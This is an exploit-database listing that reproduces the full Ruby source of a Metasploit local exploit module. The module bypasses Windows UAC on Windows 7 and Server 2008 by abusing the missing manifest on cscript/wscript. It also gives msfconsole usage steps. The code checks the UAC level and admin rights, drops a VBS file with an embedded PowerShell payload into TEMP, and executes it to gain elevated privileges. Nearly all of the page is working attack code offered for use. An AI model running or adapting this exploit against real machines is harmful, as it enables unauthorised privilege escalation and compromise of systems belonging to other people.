Windows Escalate UAC Protection Bypass (ScriptHost Vulnerability) Exploit

2015-09-05T00:00:00
ID 1337DAY-ID-24198
Type zdt
Reporter Ben Campbell
Modified 2015-09-05T00:00:00

Description

Usage Info

msf > use exploit/windows/local/bypassuac_vbs msf exploit(bypassuac_vbs) > show targets ...targets... msf exploit(bypassuac_vbs) > set TARGET <target-id> msf exploit(bypassuac_vbs) > show options ...show and set options... msf exploit(bypassuac_vbs) > exploit

                                        
                                            ##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 &lt; Msf::Exploit::Local
  Rank = ExcellentRanking

  include Exploit::FileDropper
  include Exploit::Powershell
  include Post::File
  include Post::Windows::Priv
  include Post::Windows::Runas

  def initialize(info={})
    super( update_info( info,
      'Name'          =&gt; 'Windows Escalate UAC Protection Bypass (ScriptHost Vulnerability)',
      'Description'   =&gt; %q{
        This module will bypass Windows UAC by utilizing the missing .manifest on the script host
        cscript/wscript.exe binaries.
      },
      'License'       =&gt; MSF_LICENSE,
      'Author'        =&gt; [
          'Vozzie',
          'Ben Campbell'
        ],
      'Platform'      =&gt; [ 'win' ],
      'SessionTypes'  =&gt; [ 'meterpreter' ],
      'Targets'       =&gt; [
          [ 'Automatic', { 'Arch' =&gt; [ ARCH_X86, ARCH_X86_64 ] } ]
      ],
      'DefaultTarget' =&gt; 0,
      'References'    =&gt; [
        [
          'URL', 'http://seclist.us/uac-bypass-vulnerability-in-the-windows-script-host.html',
          'URL', 'https://github.com/Vozzie/uacscript'
        ]
      ],
      'DisclosureDate'=&gt; 'Aug 22 2015'
    ))

  end

  def exploit
    # Validate that we can actually do things before we bother
    # doing any more work
    validate_environment!
    check_permissions!

    # get all required environment variables in one shot instead. This
    # is a better approach because we don't constantly make calls through
    # the session to get the variables.
    env_vars = get_envs('TEMP', 'WINDIR')

    case get_uac_level
      when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
        UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,
        UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
        fail_with(Failure::NotVulnerable,
                  "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting..."
        )
      when UAC_DEFAULT
        print_good('UAC is set to Default')
        print_good('BypassUAC can bypass this setting, continuing...')
      when UAC_NO_PROMPT
        print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')
        shell_execute_exe
        return
    end

    vbs_filepath = "#{env_vars['TEMP']}\\#{rand_text_alpha(8)}.vbs"

    upload_vbs(vbs_filepath)

    cmd_exec("cscript.exe //B #{vbs_filepath}")
  end

  def check_permissions!
    # Check if you are an admin
    vprint_status('Checking admin status...')
    admin_group = is_in_admin_group?

    if admin_group.nil?
      print_error('Either whoami is not there or failed to execute')
      print_error('Continuing under assumption you already checked...')
    else
      if admin_group
        print_good('Part of Administrators group! Continuing...')
      else
        fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
      end
    end

    if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
      fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')
    end
  end

  def upload_vbs(payload_filepath)
    vbs = File.read(File.join(Msf::Config.data_directory,
                                  'exploits',
                                  'scripthost_uac_bypass',
                                  'bypass.vbs'))

    command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true)

    vbs.gsub!('COMMAND', command)
    print_status('Uploading the Payload VBS to the filesystem...')
    begin
      vprint_status("Payload VBS #{vbs.length} bytes long being uploaded..")
      write_file(payload_filepath, vbs)
      register_file_for_cleanup(payload_filepath)
    rescue Rex::Post::Meterpreter::RequestError =&gt; e
      fail_with(Failure::Unknown, "Error uploading file #{payload_filepath}: #{e.class} #{e}")
    end
  end

  def validate_environment!
    fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?

    winver = sysinfo['OS']

    case winver
    when /Windows (7|2008)/
      print_good("#{winver} may be vulnerable.")
    else
      fail_with(Failure::NotVulnerable, "#{winver} is not vulnerable.")
    end

    if is_uac_enabled?
      print_status('UAC is Enabled, checking level...')
    else
      unless is_in_admin_group?
        fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
      end
    end
  end
end

#  0day.today [2018-01-09]  #